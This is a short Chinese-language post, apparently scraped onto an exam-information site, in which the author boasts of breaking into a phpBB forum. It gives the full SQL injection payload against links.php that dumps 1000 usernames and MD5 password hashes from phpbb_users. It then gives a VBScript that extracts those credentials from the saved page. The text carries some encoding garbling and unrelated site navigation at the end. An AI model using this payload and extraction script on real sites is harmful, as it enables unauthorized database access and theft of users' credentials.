搞了個(gè)phpbb的站���,用的是很老的links.php漏洞了���。
注入代碼如下:
links.php?t=search&search_keywords=asd&start=1,1 UNION SELECT 1,username,user_password,4,5,6,7,8,9,10,11,12,13 FROM phpbb_users where user_id limit 0,1000/*
這樣就提取了1000個(gè)用戶名和md5,將上邊的保存成htm��,要挨個(gè)提取出md5和用戶名很麻煩�����,寫了段代碼�����。這段代碼我很滿意��,估計(jì)是最簡(jiǎn)單的提取方法了,呵呵����。
代碼如下:
'用法示例:cscript //Nologo this.vbs c:\11000.htm >c:\1.txt
代碼如下:
on error resume Next
Set ie=WScript.CreateObject("InternetExplorer.Application")
set arg=wscript.arguments
if arg.count=0 then wscript.quit
ie.visible=false
ie.navigate arg(0)
While ie.Busy
WScript.Sleep 100
Wend
Do
Wscript.Sleep 200
Loop Until ie.ReadyState=4
For i=12 To ie.Document.links.length-2
data=ie.Document.links(i).innerText
If data <>13 Then
wscript.echo data
wscript.echo ie.Document.links(i).alt
End if
next
msgbox "轉(zhuǎn)換完畢"
由于各方面情況的不斷調(diào)整與變化,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考�,敬請(qǐng)考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)!
公眾號(hào)
事業(yè)單位
當(dāng)前位置:
公考類
招聘類
各類考試
